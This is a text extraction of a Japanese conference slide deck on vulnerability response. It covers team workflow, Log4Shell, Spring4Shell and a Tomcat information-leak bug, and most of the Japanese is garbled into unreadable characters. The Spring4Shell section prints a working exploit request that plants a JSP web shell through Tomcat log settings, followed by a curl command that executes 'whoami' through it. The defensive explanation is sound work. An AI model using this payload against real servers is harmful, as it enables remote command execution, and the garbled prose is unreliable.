How To 脆弱性対応

)PXUP੬ऑੑରԠ %FWFMPQFST*04BQQPSP

͜Ε͔Β࿩͢಺༰ ݸਓͷܦݧͰ͢

͸͡Ίʹ

w੬ऑੑͷͳ͍γεςϜ͸ͳ͍ͱݴ͍͍ͬͯ wݕ஌ɺӨڹൣғௐࠪɺճආࡦɺ߃ٱରԠ wݕ஌͔Βઌ͸ਓ͕൑அ͢Δ w044ͳΒ͹ίʔυΛಡΊ͹େମ෼͔Δ wηΩϡϦςΟ͸શһͰҙࣝ͢Δ ͸͡Ίʹ

ࣗݾ঺հ

ࣗݾ঺հ /BNFখࣨɹܒʢ,0.630)*3",6ʣ 5FBNQSJTNBUJYࣄۀ෦'BOOBMZνʔϜ 3PMFϓϩδΣΫτϚωʔδϟ *OUFSFTUT+BWB 4QSJOH ੬ऑੑௐࠪ

QSJTNBUJY

੬ऑੑ͸ͳͥϚζΠͷ͔

੬ऑੑ์ஔ͸ϚζΠ wϚϧ΢ΣΞͷײછ΍όοΫυΞ wϢʔβʔ৘ใ౳ͷ$PO fi EFOUJBMͳ৘ใୣऔ wผͷ߈ܸର৅ͷ౿Έ୆ w߈ܸՄೳର৅ͱͯ͠ϚʔΫ wFUDʜ

Vulnerability

੬ऑੑ͸͍ΖΜͳϨΠϠʔʹ wΠϯϑϥ w04 wϛυϧ΢ΣΞʢ࣮ߦ؀ڥʣ wΞϓϦέʔγϣϯίʔυ wଟछଟ༷ ͜ͷ͋ͨΓ͕λʔήοτͷ࿩

νΣοΫͷํ๏͸खಈ͔Βࣗಈ·Ͱ༷ʑ w$7& IUUQTXXXDWFPSH%PXOMPBET w+7/ IUUQTKWOKQ w4QSJOHܥͷ৔߹ɺ7.XBSFͷ੬ऑੑҰཡ IUUQTUBO[VWNXBSFDPNTFDVSJUZ w4OZL౳ͷηΩϡϦςΟαʔϏε w5XJUUFS

ௐ΂ͨ΋ͷͨͪ

੬ऑੑ$PNNJUΛಡΜͰߟ͑ͨΓͯ͠·͢ w-PHK੬ऑੑ໰୊ʹ͓͚Δ4QSJOH#PPUΞϓϦέʔγϣϯͷݕ ূ IUUQTEFWDMBTTNFUIPEKQBSUJDMFTMPHKSDFTQSJOHCPPUSFTFBSDI wDWF4QSJOH4IFMMͷӨڹௐࠪ IUUQTEFWDMBTTNFUIPEKQBSUJDMFTTQSJOHCPPUTQSJOHTIFMM w5PNDBUͷमਖ਼$PNNJUΛಡΜͰཧղ͢Δ$7& IUUQTEFWDMBTTNFUIPEKQBSUJDMFTSFBEUPNDBDPEFGPS DWF

ࢀর৘ใͱͯ͠ܝࡌ͞Εͨ w1JZPMPH IUUQTQJZPMPHIBUFOBEJBSZKQFOUSZ w+7/ IUUQTKWOKQWV+7/76JOEFYIUNM

ͲͷΑ͏ʹಈ͍͍ͯΔ͔

ରԠνʔϜ

ରԠνʔϜ wେମ໊͘Β͍Ͱଈ੮νʔϜ࡞੒ wऔΓ·ͱΊ໊ w࠶ݱɺӨڹௐࠪ୲౰ʙ໊ wճආࡦɺݪҼڀ໌୲౰ʙ໊

νʔϜͷಈ͖ ॳಈͰӨڹൣғͷେ͖͞ͱɺґଘͷ༗ແΛ֬ೝ Өڹ͕͋Γͦ͏ɻௐ͕ࠪඞཁͳ৔߹͸νʔϜ্ཱͪ͛ νʔϜ಺Ͱ໾ׂ෼୲ ฒߦ࡞ۀ ׂͱ͜·Ίʹ৘ใڞ༗

࠶ݱνʔϜ

࠶ݱνʔϜ w1P$ͷίʔυΛݩʹ߈ܸΛ࠶ݱ wطଘͷߏ੒ɺ৚݅Λຬͨ͢Α͏มߋͨ͠ߏ੒ɻେ͖͘ ύλʔϯͰνΣοΫ w؇࿨ࡦΛೖΕͯճආͰ͖Δ͔ΛνΣοΫɹ

ݪҼௐࠪνʔϜ

ࠜຊݪҼͷ֬ೝ wमਖ਼$PNNJU͔ΒಡΈղ͘ w෼ੳ͍ͯ͠ΔηΩϡϦςΟձࣾ΍ݸਓ͕ެ։͍ͯ͠Δ ϒϩά౳ΛಡΉʢ΄΅ӳޠ w࠶ݱͨ͠ߏ੒͔Βσόοά࣮ߦΛར༻ wϩάϨϕϧΛมߋͯ͠ಡΈղ͘

͕࣌ؒ͋ͬͨΒ΍Δ ۩ମྫ

۩ମྫ: Log4Shell

-PH4IFMM w$7& w೥຤ʹ૽͕Εͨ΍͹͍੬ऑੑ w੬ऑੑ͕͋Δର৅Ͱ͋Ε͹୭Ͱ΋࣮ߦՄೳ w-PHK Α͘஌ΒΕͨ-PHHFS࣮૷ ଞ࣮૷Ͱ୅දతͳͷ͕-PHCBDL

զʑ͕ݕূͨ͠ಈ࡞

-PH4IFMM w$7&࠾൪ΑΓઌʹ1P$͕࿩୊ʹ wઐ໳తͳ஌͕ࣝগͳͯ͘΋߈ܸͰ͖ͯ͠·͏ w೚ҙͷΫϥεΛಈతʹ*OKFDUͯ͠͠·͏

۩ମྫ: Spring4Shell

4QSJOH4IFMM 4QSJOHͷۭؾΛಡΜͰ୳͠ʹ͍͘ػߏΛѱ༻ -PH4IFMMΑΓ࣮ߦ͢ΔͨΊͷ৚͕݅ϋʔυ +BWBҎ͕߱ର৅ XBSλΠϓͰىಈ͞Ε͍ͯΔ

+BWBҎ͕߱ର৅ wNPEVMF͸+BWBҎ߱ w+BWBҎલ͸NPEVMF͕ͳ͍ͷͰ1P$ͷ߈ܸํ๏ ͸੒ޭ͠ͳ͍ IUUQTXXXPSBDMFDPNDPSQPSBUFGFBUVSFTVOEFSTUBOEJOH KBWBNPEVMFTIUNM

ىಈλΠϓͷҧ͍ wXBSλΠϓʹΑΔΞϓϦέʔγϣϯ͕ର৅ wCPPU+BS CPPU8BS౳ͷ୯ಠͰىಈՄೳͳ΋ͷ͸ର ৅֎

ҎԼͷϦΫΤετΛղऍ͠Α͏ͱ͢Δ wҎԼΛ#PEZʹؚΊͯ1045ͰϦΫΤετ w%BUB#JOEJOHͰ#JOEͰ͖ΔΫϥεΛ୳͢ class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2 %7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22))) %7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.get Parameter(%22cmd%22)).getInputStream() %3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20wh ile((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))
%3B%20%7D%20%7D%20%25%7Bsuffix%7Di &class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp &class.module.classLoader.resources.context.parent.pipeline.first.directory=webap ps/ROOT &class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwa r &class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

ԿΛ͠Α͏ͱ͍ͯ͠Δ͔ w$MBTT-PBEFSΛḷͬͯ"DDFTT7BMWFʹΞΫηε w5PNDBUͷϩάग़ྗઃఆΛॻ͖׵͑Δ wϩάग़ྗύλʔϯʹ಺෦৘ใΛऔಘ͢ΔίʔυΛจࣈͱ ͯ͠ຒΊࠐΉ wϩάϑΝΠϧΛ+41ͱ֦ͯ͠ுࢠΛมߋ wϩάϑΝΠϧग़ྗઌΛ5PNDBUͷެ։σΟϨΫτϦʹม ߋ

࣮ߦ͞ΕΔͱԿ͕ى͖Δ͔ wϦΫΤετΛ࣮ߦ͢ΔͱϩάϑΝΠϧ͕+41ͱͳΔ wެ։͞ΕΔ %25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22))) %7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParamet er(%22cmd%22)).getInputStream() %3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a% 3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di %{c2}i
if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = %{c1} i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %{suffix}i curl -X GET 'http://localhost:8080/tomcatwar.jsp?pwd=j&cmd=whoami' XIPBNJ͕ग़ྗ͞ΕΔ

ىಈλΠϓ ߈ܸख๏͕༗ޮͳ$MBTT-PBEFS 8FCBQQ$MBTT-PBEFS ߈ܸख๏͕ແޮͳ$MBTT-PBEFS -BVODIFE63-$MBTT-PBEFS ͯ͞ɻҧ͍͸ͳʹ͔ɻ

ҧ͍͸HFU3FTPVSDFT .BZCF 8FCBQQ$MBTT-PBEFSͷ৔߹ɺҾ਺ͳ͠ͷ HFU3FTPVSDFT ͕ఆٛ͞Ε͍ͯΔ IUUQTUPNDBUBQBDIFPSHUPNDBUEPDBQJPSHBQBDIF DBUBMJOBMPBEFS8FCBQQ$MBTT-PBEFS#BTFIUNMHFU3FTPVSDFT

ҧ͍͸HFU3FTPVSDFT .BZCF -BVODIFE63-$MBTT-PBEFSͷ৔߹ɺҾ਺ͳ͠ͷ HFU3FTPVSDFT ͷఆٛ͸ͳ͍ IUUQTEPDTPSBDMFDPNKBWBTFKQEPDTBQJKBWBCBTFKBWBMBOH $MBTT-PBEFSIUNMHFU3FTPVSDF KBWBMBOH4USJOH

#JOEJOHͰ$MBTT-PBEFS΁ΞΫηε DMBTTNPEVMFDMBTT-PBEFS HFU$MBTT HFU.PEVMF HFU$MBTT-PBEFS class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20 if(%22j%22.equals(request.getParameter(%22pwd%22))) %7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParamet er(%22cmd%22)).getInputStream()
%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a% 3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di ͜ͷ$MBTT-PBEFS͕8FCBQQ$MBTT-PBEFSͩͱ Ҿ਺ͳ͠ͷHFU3FTPVSDFT ͕ଘࡏ͢Δ

5SBWFSTF$MBTT 8FCBQQ$MBTT-PBEFSHFU3FTPVSDFT 8FC3FTPVSDF3PPUHFU$POUFYU $POUFYUHFU1BSFOU $POUBJOFSHFU1JQFMJOF
1JQFMJOFHFU'JSTU 7BMWF "DDFTT7BMWF

ͲͷΑ͏ʹमਖ਼͞Ε͔ͨ IUUQTHJUIVCDPNTQSJOHQSPKFDUTTQSJOHGSBNFXPSLQVMM fi MFT $MBTT-PBEFS΁ͷϓϩύςΟΞΫηε͸ແࢹ

۩ମྫ: Tomcat ͷ৘ใ࿙͍͑

3FTQPOTF͕ࠞࡏ͢Δ w+7/76"QBDIF5PNDBUʹ )UUQ1SPDFTTPSΠϯελϯεʹ͓͚Δڝ߹ঢ়ଶʹ ΑΔ৘ใ࿙͍͑ͷ੬ऑੑ IUUQTKWOKQWV+7/76JOEFYIUNM

࠶ݱ৚͕݅ݫ͍͠ w֎෦͔Β೚ҙͰ࣮ߦ͢Δͷ͸೉͍͠ wۮવൃੜ͢ΔՄೳੑ͸͋Δ wର৅͸ҎԼ "QBDIF5PNDBU.UP. "QBDIF5PNDBU.UP "QBDIF5PNDBU.UP "QBDIF5PNDBUUP

मਖ਼$PNNJUΛಡΉ IUUQTHJUIVCDPNBQBDIFUPNDBUDPNNJUCBEFGDDGEGD w0CKFDU "UPNJD3FGFSFODF0 CKFDU΁มߋ wUBLF$VSSFOU1SPDFTT PS ͕௥Ճ

ͬ͘͟Γཧղ͢Δʢݸਓͷݟղ wෳ਺ͷϓϩηε͔Βࢀর͞ΕΔ0CKFDU w͜ͷ0CKFDU͸4PDLFUʹ3FTQPOTFΛॻ͖ࠐΉ wHFUͨ͠ޙɺ͠Β͹͔ͯ͘͠ΒOVMMΛ୅ೖ͢Δॲཧ wۮવOVMMΛಥͬࠐΉલʹผϓϩηε͕0CKFDUʹΞΫηε ͢Δͱɺಉ͡ࢀর͕ฦΔ wෳ਺ͷ3FTQPOTFΛಉ͡0CKFDUʹॻ͖ࠐΉ IUUQTEFWDMBTTNFUIPEKQBSUJDMFTSFBEUPNDBDPEFGPSDWF

·ͱΊ

·ͱΊ w੬ऑੑ͸਎ۙʹ͋Γ·͢ ରԠ଴ͬͨͳ͠ wଞਓͷ࡞ͬͨίʔυΛ࢖Θͣʹ։ൃͰ͖Δ΋ͷ͸গͳ ͍ w։ൃऀ͸ར༻͍ͯ͠Δ044Λ΋ͬͱҙࣝ͠·ͤ͏ wηΩϡϦςΟ͸ΈΜͳͰߟ͑·ͤ͏

͓ΘΓ

How To 脆弱性対応

How To 脆弱性対応

More Decks by komuro-sapporo

Other Decks in Programming

Featured

Transcript